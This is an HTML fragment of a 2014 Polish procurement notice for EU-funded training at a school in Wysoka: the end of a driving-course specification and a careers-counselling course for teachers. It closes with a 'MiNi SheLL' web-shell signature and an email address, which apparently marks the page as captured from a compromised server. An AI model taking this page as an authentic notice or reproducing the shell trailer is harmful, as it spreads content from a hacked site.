- 30 godzin zajęć teoretycznych.
- 30 godzin nauki jazdy.

1.6 Godzina zajęć teoretycznych odpowiada 45 minutom. 
1.7 Godzina nauki jazdy odpowiada 60 minutom.
1.8 Zajęcia teoretyczne mogą odbywać się w piątki od godz. 15.30 i/lub soboty od godz. 8.00.
1.9 Nauka jazdy może odbywać się od poniedziałku do piątku w godzinach wolnych od zajęć szkolnych oraz w soboty, a po uzgodnieniu z uczestniczką/uczestnikiem kursu również w niedziele.
1.10 Wykonawca zobowiązany jest do:
- Przeprowadzenia niezbędnych badań lekarskich przed rozpoczęciem kursu 
- Ubezpieczenia NNW uczestniczek i uczestników kursu oraz dostarczenia Zamawiającemu kopii potwierdzającej zawarcie umowy NNW
- Zapewnienia odpowiedniego miejsca i warunków oraz pojazdów do przeprowadzenia szkolenia
-Oznakowania miejsca szkolenia teoretycznego logotypami Programu Operacyjnego Kapitał Ludzki i Unii Europejskiej - Europejskiego Funduszu Społecznego, nazwą projektu wraz z  zapisem o współfinansowaniu kursu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego
-Przekazania każdemu uczestnikowi materiałów szkoleniowych zaopatrzonych
w logotypy Programu Operacyjnego Kapitał Ludzki i Unii Europejskiej - Europejskiego Funduszu Społecznego, nazwę projektu oraz zapis 
o współfinansowaniu kursu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego
- Zgłoszenia uczestników na egzamin państwowy i poinformowanie Zamawiającego  o jego terminie.

1.11 Wykonawca ponosi wszystkie koszty związane z realizacją przedmiotu zamówienia tj.
- Koszty materiałów szkoleniowych, w tym podręcznika, płyt CD, testów próbnych
- Koszty wynajmu sali wykładowej
- Koszty wynajmu placu manewrowego
- Koszty egzaminu wewnętrznego teoretycznego i praktycznego 
- Koszty pierwszego egzaminu teoretycznego i praktycznego w Wojewódzkim Ośrodku Ruchu Drogowego
- Koszty niezbędnych badań lekarskich dla osób rozpoczynających kurs 
- Koszty ubezpieczenia NNW uczestniczki/uczestnika kursu
 
1.12 Wykonawca przedłoży szczegółowy program zajęć ze wskazaniem ilości zajęć, uwzględniając zapisy SIWZ.
1.13 Realizator zastrzega sobie prawo do ustalenia harmonogramu zajęć, do którego Wykonawca nie będzie wnosił żadnych zastrzeżeń.
1.14 Po zakończeniu zajęć Wykonawca wyda uczestnikom zajęć zaświadczenie potwierdzające zdanie wewnętrznego egzaminu teoretycznego i praktycznego    posiadające logotypy Programu Operacyjnego Kapitał Ludzki i Unii Europejskiej - Europejskiego Funduszu Społecznego oraz zapis o współfinansowaniu kursu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego dostarczone przez Zamawiającego.
1.15 Wykonawca zobowiązany jest do zapewnienia warunków zgodnych z przepisami BHP w trakcie trwania kursu.
1.16 Realizator zastrzega sobie możliwość prowadzenia bieżącego nadzoru nad procesem szkolenia beneficjentów na każdym jego etapie. 
1.17 Dokumenty z zajęć, które powinien przedłożyć Wykonawca po zakończeniu kursu:
- Listy obecności uczestników kursu
- Dziennik zajęć
- Protokół odbioru zaświadczeń potwierdzających zdanie egzaminu wewnętrznego.  
- Kserokopie zaświadczeń 
- Ankiety ewaluacyjne kursu
1.18 Realizator zastrzega sobie prawo do wykonania jednorazowej zapłaty wynagrodzenia po wykonaniu całej usługi objętej przedmiotem zamówienia, w terminie do 30 dni od dnia dostarczenia faktury. Realizator nie przewiduje zaliczek na poczet wykonania przedmiotu zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.41.12.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ORGANIZACJA I PRZEPROWADZENIE SZKOLEŃ W RAMACH PROJEKTU PODKARPACIE STAWIA NA ZAWODOWCÓW REALIZOWANEGO 
W ZESPOLE SZKÓŁ IM. TADEUSZA KOŚCIUSZKI W WYSOKIEJ 

Doradztwo edukacyjno-zawodowe - szkolenie Rad Pedagogicznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2. DORADZTWO EDUKACYJNO-ZAWODOWE - SZKOLENIE RAD PEDAGOGICZNYCH
2.1. Miejsce przeprowadzenia szkolenia: Zespół Szkół im. T. Kościuszki w Wysokiej 49, 37-100 Łańcut. Wykonawca nie ponosi kosztów wynajęcia sali.
2.2. Planowana ilość osób: do 25 nauczycielek i nauczycieli Zespołu Szkół im.  T. Kościuszki w Wysokiej. Grupę skompletuje Realizator.
2.3. Termin przeprowadzenia szkolenia: pierwszy dzień - czerwiec 2014 r.; drugi dzień - wrzesień 2014 r.
2.4. Szkolenie powinno obejmować 8 godzin (2 x 4 godz.) zajęć o następującej tematyce:
- zadania szkoły w zakresie doradztwa edukacyjno-zawodowego;
- diagnozowanie zapotrzebowania uczniów na informacje edukacyjne i zawodowe oraz na pomoc w planowaniu kształcenia i kariery zawodowej;
- tworzenie wewnątrzszkolnego system doradztwa edukacyjno-zawodowego;
- prowadzenie grupowych zajęć aktywizujących, przygotowujących uczniów do świadomego planowania kariery i podjęcia roli zawodowej.

2.5. Wykonawca zobowiązuje się przeprowadzić 8 godzin szkolenia. Szkolenie może odbywać się w od poniedziałku do czwartku po zakończeniu obowiązkowych zajęć lekcyjnych. 
2.6. Godzina zajęć odpowiada 45 minutom.
2.7. Realizator udostępni nieodpłatnie salę szkoleniową.
2.8. Wykonawca przedłoży szczegółowy program zajęć ze wskazaniem ilości zajęć, uwzględniając zapisy SIWZ.
2.9. Realizator zastrzega sobie prawo do ustalenia harmonogramu zajęć, do którego Wykonawca nie będzie wnosił żadnych zastrzeżeń.
2.10. Po zakończeniu zajęć Wykonawca wyda uczestnikom zajęć zaświadczenie  posiadające logotypy Programu Operacyjnego Kapitał Ludzki i Unii Europejskiej - Europejskiego Funduszu Społecznego oraz zapis o współfinansowaniu kursu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego dostarczone przez Zamawiającego. Wykonawca zobowiązany jest do zapewnienia warunków zgodnych z przepisami BHP w trakcie trwania kursu.
2.11. Dokumenty z zajęć, które powinien przedłożyć Wykonawca po  zakończeniu kursu:
- Listy obecności uczestników kursu
- Dziennik zajęć
- Protokół odbioru zaświadczeń  
- Kserokopie zaświadczeń 
- Ankiety ewaluacyjne szkolenia 

2.12. Realizator zastrzega sobie prawo do wykonania jednorazowej zapłaty wynagrodzenia po wykonaniu całej usługi objętej przedmiotem zamówienia tj. po zdaniu egzaminu wewnętrznego teoretycznego i praktycznego przez wszystkich uczestników szkolenia oraz skierowaniu i wniesieniu opłaty egzaminacyjnej /dla części teoretycznej i części praktycznej) w WORD dla wszystkich uczestników,  w terminie   do 30 dni od dnia dostarczenia faktury. Realizator nie przewiduje zaliczek na poczet wykonania przedmiotu zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com